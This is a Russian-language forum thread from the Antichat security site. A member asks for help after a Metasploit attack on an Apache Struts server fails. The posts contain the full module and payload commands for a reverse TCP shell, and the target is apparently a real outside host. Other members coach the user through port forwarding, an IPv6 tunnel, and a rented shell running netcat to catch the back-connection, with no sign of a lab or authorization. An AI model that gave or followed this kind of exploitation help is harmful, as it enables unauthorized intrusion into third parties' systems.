HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.02.2016, 10:44
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

пытаюсь заюзать один сплойт, подскажите что я не так делаю. начну по порядку:

set RHOST 127.0.0.1 (здесь ip нужной машины)

set URI /web/user/loginOut.action

set RPORT 80

set TARGET 1

use exploit/multi/http/struts_code_exec

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 10.0.2.15

set LPORT 444

msf exploit(struts_code_exec) > exploit
[*] Started reverse TCP handler on 10.0.2.15:444
[*] Exploit completed, but no session was created.

kali на виртуалке. на физической тачке модем. может что не так с LHOST!?

root@john321:~# ip address

1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

inet 127.0.0.1/8 scope host lo

valid_lft forever preferred_lft forever

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

link/ether 08:00:27:95:4c:9c brd ff:ff:ff:ff:ff:ff

inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0

valid_lft 68663sec preferred_lft 68663sec

inet6 fe80::a00:27ff:fe95:4c9c/64 scope link

valid_lft forever preferred_lft forever
 
Ответить с цитированием

  #2  
Старый 11.02.2016, 11:08
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

RHOST в одной сети находится? если нет ,то он никак не сможет создать сессию на 10.0.2.15
 
Ответить с цитированием

  #3  
Старый 11.02.2016, 11:46
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

А мсф от кого запущен? Порты
 
Ответить с цитированием

  #4  
Старый 11.02.2016, 11:57
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от grimnir  

RHOST в одной сети находится? если нет ,то он никак не сможет создать сессию на 10.0.2.15
хм. а тут подробнее. атакуемый RHOST 14.17.***.236 то есть мне LHOST сделать типо 14.17.***.111 ?
 
Ответить с цитированием

  #5  
Старый 11.02.2016, 11:58
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

[QUOTE="rct"]

А мсф от кого запущен? Порты
 
Ответить с цитированием

  #6  
Старый 11.02.2016, 12:52
blackbox
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от rumbln  

хм. а тут подробнее. атакуемый RHOST 14.17.***.236 то есть мне LHOST сделать типо 14.17.***.111 ?
Нужно чтобы LHOST был доступен для атакуемой машины, чтобы пэйлоад подключится смог. Нужно проброс портов делать с маршрутизатора, чтобы виртуалка кали в случае успеха могла принять входящее соединение.
 
Ответить с цитированием

  #7  
Старый 11.02.2016, 13:10
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  

Нужно чтобы LHOST был доступен для атакуемой машины, чтобы пэйлоад подключится смог. Нужно проброс портов делать с маршрутизатора, чтобы виртуалка кали в случае успеха могла принять входящее соединение.
извиняюсь за нубские вопросы, но как это сделать в моем случае. к физическому компу подключен модем yota. внутренний на компе 10.0.0.5 к примеру. внешний у модема понятное дело другой. в Kali как уже говорил 10.0.2.15.
 
Ответить с цитированием

  #8  
Старый 11.02.2016, 13:41
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

точнее тут ситуация еще хуже. есть внешний белый ип, затем у моего модема серый - внутренняя сеть yota - и затем уже мой комп. безвыходная ситуация?!
 
Ответить с цитированием

  #9  
Старый 11.02.2016, 14:10
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Цитата:
Сообщение от rumbln  

извиняюсь за нубские вопросы, но как это сделать в моем случае. к физическому компу подключен модем yota. внутренний на компе 10.0.0.5 к примеру. внешний у модема понятное дело другой. в Kali как уже говорил 10.0.2.15
Тебе надо зайти на роутер, найти где-то там "перенаправление", выбрать с какого порта перенаправлять на какой внутренний адрес и порт. Смотри как у меня

или может попробовать ipv6. На кали поставь miredo и запусти демона.
 
Ответить с цитированием

  #10  
Старый 11.02.2016, 15:54
blackbox
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от rumbln  

точнее тут ситуация еще хуже. есть внешний белый ип, затем у моего модема серый - внутренняя сеть yota - и затем уже мой комп. безвыходная ситуация?!
Нет, сказать что безвыходная нельзя. Тут можно либо зарегать шелл на unixssh.com, например и повесить там неткат. Только тогда соответствующий пейлоад нужно выбрать (не метерпретер) а обычный бек-коннект, допустим.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.